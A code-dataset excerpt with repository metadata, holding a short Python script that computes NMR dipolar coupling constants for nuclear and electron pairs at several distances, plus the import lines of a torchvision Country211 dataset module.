| 22.454545 | 92 | 0.805668 |
0b4cc6aa957df616a9c14313fa9b9ee7ec6d0837 | 1,434 | py | Python | calculators/static_dipolar_couplings/dcc.py | jlorieau/nmr | 15224342a9277da8b02e10027644c86ac3769db1 | [
"MIT"
] | null | null | null | calculators/static_dipolar_couplings/dcc.py | jlorieau/nmr | 15224342a9277da8b02e10027644c86ac3769db1 | [
"MIT"
] | null | null | null | calculators/static_dipolar_couplings/dcc.py | jlorieau/nmr | 15224342a9277da8b02e10027644c86ac3769db1 | [
"MIT"
] | null | null | null | from math import pi
u0 = 4.*pi*1E-7 # T m /A
hbar = 1.0545718E-34 # J s
# 1 T = kg s^-2 A-1 = J A^-1 m^-2
g = {
'1H' : 267.513E6, # rad T^-1 s^-1
'13C': 67.262E6,
'15N': -27.116E6,
'e': 176086E6
}
# nuc_i, nuc_j: nucleus string. ex: '1H'
# r_ij: distance in Angstroms
DCC = lambda nuc_i, nuc_j, r_ij: -1.*(u0*g[nuc_i]*g[nuc_j]*hbar)/(4.*pi*(r_ij*1E-10)**3)
print('-'*30)
print('1H-15N (1.02A): {:> 8.1f} Hz'.format(DCC('1H','15N', 1.02)/(2.*pi), 'Hz'))
print('1H-15N (1.04A): {:> 8.1f} Hz'.format(DCC('1H','15N', 1.04)/(2.*pi), 'Hz'))
print('-'*30)
print('1H-13C (1.1A): {:> 8.1f} Hz'.format(DCC('1H','13C', 1.1)/(2.*pi), 'Hz'))
print('-'*30)
print('1H-1H (1.00A): {:> 8.1f} Hz'.format(DCC('1H','1H', 1.0)/(2.*pi), 'Hz'))
print('1H-1H (2.4A): {:> 8.1f} Hz'.format(DCC('1H','1H', 2.4)/(2.*pi), 'Hz'))
print('1H-1H (2.8A): {:> 8.1f} Hz'.format(DCC('1H','1H', 2.8)/(2.*pi), 'Hz'))
print('-'*30)
print('13C-13C (1.53A): {:> 8.1f} Hz'.format(DCC('13C','13C', 1.53)/(2.*pi), 'Hz'))
print('-'*30)
print('1H-e (1A): {:> 8.1f} MHz'.format(DCC('1H','e', 1.0)/(1E6*2.*pi), 'Hz'))
print('1H-e (5A): {:> 8.1f} kHz'.format(DCC('1H','e', 5.0)/(1E3*2.*pi), 'Hz'))
print('1H-e (10A): {:> 8.1f} kHz'.format(DCC('1H','e', 10.0)/(1E3*2.*pi), 'Hz'))
print('1H-e (50A): {:> 8.1f} kHz'.format(DCC('1H','e', 50.0)/(1E3*2.*pi), 'Hz'))
print('1H-e (100A): {:> 8.1f} Hz'.format(DCC('1H','e', 100.0)/(2.*pi), 'Hz'))
print('-'*30)
| 34.142857 | 89 | 0.502092 |
0b4dc3067343c33e32c44d539a787edba0c40515 | 2,197 | py | Python | torchvision/prototype/datasets/_builtin/country211.py | SariaCxs/vision | 1db8795733b91cd6dd62a0baa7ecbae6790542bc | [
"BSD-3-Clause"
] | 1 | 2022-03-31T02:37:35.000Z | 2022-03-31T02:37:35.000Z | torchvision/prototype/datasets/_builtin/country211.py | SariaCxs/vision | 1db8795733b91cd6dd62a0baa7ecbae6790542bc | [
"BSD-3-Clause"
] | null | null | null | torchvision/prototype/datasets/_builtin/country211.py | SariaCxs/vision | 1db8795733b91cd6dd62a0baa7ecbae6790542bc | [
"BSD-3-Clause"
] | null | null | null | import pathlib
from typing import Any, Dict, List, Tuple
from torchdata.datapipes.iter import IterDataPipe, Mapper, Filter
from torchvision.prototype.datasets.utils import Dataset, DatasetConfig, DatasetInfo, HttpResource, OnlineResource
from torchvision.prototype.datasets.utils._internal import path_comparator, hint_sharding, hint_shuffling
from torchvision.prototype.features import EncodedImage, Label
| 38.54386 | 114 | 0.65817 |